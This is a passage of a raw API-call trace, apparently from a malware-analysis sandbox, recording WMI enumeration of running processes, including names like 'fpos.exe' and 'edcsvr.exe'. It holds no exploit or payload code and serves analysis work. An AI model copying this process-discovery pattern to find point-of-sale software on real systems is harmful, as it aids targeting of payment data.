WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2d8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.422] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2d8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x552a158) returned 0x0 [0265.422] WbemDefPath:IUnknown:Release (This=0x54ba2d8) returned 0x0 [0265.422] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a158, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x552a158) returned 0x0 [0265.422] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a158, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.422] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a158, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.423] WbemDefPath:IUnknown:AddRef (This=0x552a158) returned 0x3 [0265.423] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a158, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.423] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a158, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.423] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a158, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5537060) returned 0x0 [0265.423] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5537060, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.423] WbemDefPath:IUnknown:Release (This=0x5537060) returned 0x3 [0265.423] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a158, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.423] WbemDefPath:IUnknown:Release (This=0x552a158) returned 0x2 [0265.423] WbemDefPath:IUnknown:Release (This=0x552a158) returned 0x1 [0265.423] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a158, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x552a158) returned 0x0 [0265.423] WbemDefPath:IUnknown:AddRef (This=0x552a158) returned 0x3 [0265.423] WbemDefPath:IUnknown:Release (This=0x552a158) returned 0x2 [0265.423] WbemDefPath:IWbemPath:SetText (This=0x552a158, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4440\"") returned 0x0 [0265.423] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.423] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.423] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.423] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.424] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.424] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.424] IWbemClassObject:Get (in: This=0x5539fa0, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23ea560*=0, plFlavor=0x23ea564*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="fpos.exe", varVal2=0x0), pType=0x23ea560*=8, plFlavor=0x23ea564*=0) returned 0x0 [0265.424] SysStringByteLen (bstr="fpos.exe") returned 0x10 [0265.424] SysStringByteLen (bstr="fpos.exe") returned 0x10 [0265.424] IWbemClassObject:Get (in: This=0x5539fa0, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23ea560*=8, plFlavor=0x23ea564*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="fpos.exe", varVal2=0x0), pType=0x23ea560*=8, plFlavor=0x23ea564*=0) returned 0x0 [0265.424] SysStringByteLen (bstr="fpos.exe") returned 0x10 [0265.424] SysStringByteLen (bstr="fpos.exe") returned 0x10 [0265.424] CoTaskMemAlloc (cb=0x4) returned 0x54ba398 [0265.424] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba398, puReturned=0x23c1fd0 | out: apObjects=0x54ba398*=0x55392e0, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.425] IUnknown:QueryInterface (in: This=0x55392e0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x55392e0) returned 0x0 [0265.425] IUnknown:QueryInterface (in: This=0x55392e0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.425] IUnknown:QueryInterface (in: This=0x55392e0, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.425] IUnknown:QueryInterface (in: This=0x55392e0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.425] IUnknown:AddRef (This=0x55392e0) returned 0x3 [0265.425] IUnknown:QueryInterface (in: This=0x55392e0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.425] IUnknown:QueryInterface (in: This=0x55392e0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.425] IUnknown:QueryInterface (in: This=0x55392e0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x55392e4) returned 0x0 [0265.425] IMarshal:GetUnmarshalClass (in: This=0x55392e4, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.425] IUnknown:Release (This=0x55392e4) returned 0x3 [0265.426] IUnknown:QueryInterface (in: This=0x55392e0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.426] IUnknown:Release (This=0x55392e0) returned 0x2 [0265.426] IUnknown:QueryInterface (in: This=0x55392e0, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x55392e0) returned 0x0 [0265.426] IUnknown:AddRef (This=0x55392e0) returned 0x4 [0265.426] IUnknown:Release (This=0x55392e0) returned 0x3 [0265.426] IUnknown:Release (This=0x55392e0) returned 0x2 [0265.426] CoTaskMemFree (pv=0x54ba398) [0265.426] IUnknown:AddRef (This=0x55392e0) returned 0x3 [0265.426] IWbemClassObject:Get (in: This=0x55392e0, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.426] IWbemClassObject:Get (in: This=0x55392e0, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4448\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.426] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4448\"") returned 0x5e [0265.426] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4448\"") returned 0x5e [0265.426] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.426] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.426] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.426] IUnknown:Release (This=0x601a94) returned 0x1 [0265.427] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2d8) returned 0x0 [0265.427] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2d8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.427] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2d8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x552a4d8) returned 0x0 [0265.427] WbemDefPath:IUnknown:Release (This=0x54ba2d8) returned 0x0 [0265.427] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a4d8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x552a4d8) returned 0x0 [0265.427] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a4d8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.427] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a4d8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.427] WbemDefPath:IUnknown:AddRef (This=0x552a4d8) returned 0x3 [0265.428] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a4d8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.428] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a4d8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.428] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a4d8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5536f70) returned 0x0 [0265.428] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5536f70, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.428] WbemDefPath:IUnknown:Release (This=0x5536f70) returned 0x3 [0265.428] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a4d8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.428] WbemDefPath:IUnknown:Release (This=0x552a4d8) returned 0x2 [0265.428] WbemDefPath:IUnknown:Release (This=0x552a4d8) returned 0x1 [0265.428] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a4d8, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x552a4d8) returned 0x0 [0265.428] WbemDefPath:IUnknown:AddRef (This=0x552a4d8) returned 0x3 [0265.428] WbemDefPath:IUnknown:Release (This=0x552a4d8) returned 0x2 [0265.429] WbemDefPath:IWbemPath:SetText (This=0x552a4d8, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4448\"") returned 0x0 [0265.429] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.429] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.429] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.429] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.429] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.429] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.429] IWbemClassObject:Get (in: This=0x55392e0, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23eade4*=0, plFlavor=0x23eade8*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="edcsvr.exe", varVal2=0x0), pType=0x23eade4*=8, plFlavor=0x23eade8*=0) returned 0x0 [0265.429] SysStringByteLen (bstr="edcsvr.exe") returned 0x14 [0265.429] SysStringByteLen (bstr="edcsvr.exe") returned 0x14 [0265.429] IWbemClassObject:Get (in: This=0x55392e0, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23eade4*=8, plFlavor=0x23eade8*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="edcsvr.exe", varVal2=0x0), pType=0x23eade4*=8, plFlavor=0x23eade8*=0) returned 0x0 [0265.429] SysStringByteLen (bstr="edcsvr.exe") returned 0x14 [0265.429] SysStringByteLen (bstr="edcsvr.exe") returned 0x14 [0265.429] CoTaskMemAlloc (cb=0x4) returned 0x54ba2d8 [0265.429] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2d8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2d8*=0x5539478, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.430] IUnknown:QueryInterface (in: This=0x5539478, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x5539478) returned 0x0 [0265.430] IUnknown:QueryInterface (in: This=0x5539478, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.430] IUnknown:QueryInterface (in: This=0x5539478, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.430] IUnknown:QueryInterface (in: This=0x5539478, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.430] IUnknown:AddRef (This=0x5539478) returned 0x3 [0265.430] IUnknown:QueryInterface (in: This=0x5539478, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.430] IUnknown:QueryInterface (in: This=0x5539478, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.430] IUnknown:QueryInterface (in: This=0x5539478, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x553947c) returned 0x0 [0265.430] IMarshal:GetUnmarshalClass (in: This=0x553947c, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.430] IUnknown:Release (This=0x553947c) returned 0x3 [0265.431] IUnknown:QueryInterface (in: This=0x5539478, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.431] IUnknown:Release (This=0x5539478) returned 0x2 [0265.431] IUnknown:QueryInterface (in: This=0x5539478, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x5539478) returned 0x0 [0265.431] IUnknown:AddRef (This=0x5539478) returned 0x4 [0265.431] IUnknown:Release (This=0x5539478) returned 0x3 [0265.431] IUnknown:Release (This=0x5539478) returned 0x2 [0265.431] CoTaskMemFree (pv=0x54ba2d8) [0265.431] IUnknown:AddRef (This=0x5539478) returned 0x3 [0265.431] IWbemClassObject:Get (in: This=0x5539478, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.431] IWbemClassObject:Get (in: This=0x5539478, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4456\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.431] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4456\"") returned 0x5e [0265.431] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4456\"") returned 0x5e [0265.431] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.431] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.431] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, 